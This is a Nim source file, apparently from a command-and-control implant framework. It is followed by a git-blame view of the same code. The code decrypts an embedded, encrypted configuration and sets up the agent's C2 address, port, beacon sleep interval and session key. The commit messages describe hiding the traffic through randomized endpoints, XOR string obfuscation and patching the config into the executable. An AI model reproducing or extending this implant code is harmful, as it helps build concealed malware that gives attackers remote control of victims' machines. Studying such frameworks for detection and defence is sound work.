src/agent/core/context.nim

import parsetoml, base64, system
import ../../common/[types, utils, crypto, serialize]

const CONFIGURATION {.strdefine.}: string = ""

proc deserializeConfiguration(config: string): AgentCtx = 
    
    var unpacker = Unpacker.init(config) 
        
    var aesKey = unpacker.getByteArray(Key)
    let 
        iv = unpacker.getByteArray(Iv)
        authTag = unpacker.getByteArray(AuthenticationTag)
        length = int(unpacker.getUint32())  

    # Decrypt profile configuration
    let (decData, gmac) = decrypt(aesKey, iv, unpacker.getBytes(length))
    wipeKey(aesKey)

    if gmac != authTag: 
        raise newException(CatchableError, protect("Invalid authentication tag."))

    # Parse decrypted profile configuration 
    unpacker = Unpacker.init(Bytes.toString(decData))

    var agentKeyPair = generateKeyPair() 
    var ctx = AgentCtx(
        agentId: generateUUID(),
        listenerId: Uuid.toString(unpacker.getUint32()),
        ip: unpacker.getDataWithLengthPrefix(),
        port: int(unpacker.getUint32()),
        sleep: int(unpacker.getUint32()),
        sessionKey: deriveSessionKey(agentKeyPair, unpacker.getByteArray(Key)),
        agentPublicKey: agentKeyPair.publicKey,
        profile: parseString(unpacker.getDataWithLengthPrefix())
    ) 

    wipeKey(agentKeyPair.privateKey)
    
    echo protect("[+] Profile configuration deserialized.")
    return ctx

proc init*(T: type AgentCtx): AgentCtx = 

    try: 
        when not defined(CONFIGURATION):
            raise newException(CatchableError, protect("Missing agent configuration."))

        return deserializeConfiguration(CONFIGURATION)

    except CatchableError as err:
        echo "[-] " & err.msg
        return nil
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`import parsetoml, base64, system`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00			`import ../../common/[types, utils, crypto, serialize]`

			`const CONFIGURATION {.strdefine.}: string = ""`

			`proc deserializeConfiguration(config: string): AgentCtx =`

			`var unpacker = Unpacker.init(config)`
Implemented encryption for embedded profile. 2025-08-19 20:03:34 +02:00
			`var aesKey = unpacker.getByteArray(Key)`
			`let`
			`iv = unpacker.getByteArray(Iv)`
			`authTag = unpacker.getByteArray(AuthenticationTag)`
			`length = int(unpacker.getUint32())`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00
Implemented encryption for embedded profile. 2025-08-19 20:03:34 +02:00			`# Decrypt profile configuration`
			`let (decData, gmac) = decrypt(aesKey, iv, unpacker.getBytes(length))`
			`wipeKey(aesKey)`

			`if gmac != authTag:`
Implemented compile-time string obfuscation via XOR for the agent. 2025-08-26 15:11:43 +02:00			`raise newException(CatchableError, protect("Invalid authentication tag."))`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00
Implemented encryption for embedded profile. 2025-08-19 20:03:34 +02:00			`# Parse decrypted profile configuration`
			`unpacker = Unpacker.init(Bytes.toString(decData))`

			`var agentKeyPair = generateKeyPair()`
Refactor profile de/serialization, removing unnecessary overhead caused by TLV format. 2025-08-19 14:34:58 +02:00			`var ctx = AgentCtx(`
			`agentId: generateUUID(),`
			`listenerId: Uuid.toString(unpacker.getUint32()),`
			`ip: unpacker.getDataWithLengthPrefix(),`
			`port: int(unpacker.getUint32()),`
			`sleep: int(unpacker.getUint32()),`
			`sessionKey: deriveSessionKey(agentKeyPair, unpacker.getByteArray(Key)),`
			`agentPublicKey: agentKeyPair.publicKey,`
			`profile: parseString(unpacker.getDataWithLengthPrefix())`
			`)`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00
Implemented encryption for embedded profile. 2025-08-19 20:03:34 +02:00			`wipeKey(agentKeyPair.privateKey)`

Implemented compile-time string obfuscation via XOR for the agent. 2025-08-26 15:11:43 +02:00			`echo protect("[+] Profile configuration deserialized.")`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00			`return ctx`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00
			`proc init*(T: type AgentCtx): AgentCtx =`

			`try:`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00			`when not defined(CONFIGURATION):`
Implemented compile-time string obfuscation via XOR for the agent. 2025-08-26 15:11:43 +02:00			`raise newException(CatchableError, protect("Missing agent configuration."))`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00			`return deserializeConfiguration(CONFIGURATION)`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00
			`except CatchableError as err:`
			`echo "[-] " & err.msg`
			`return nil`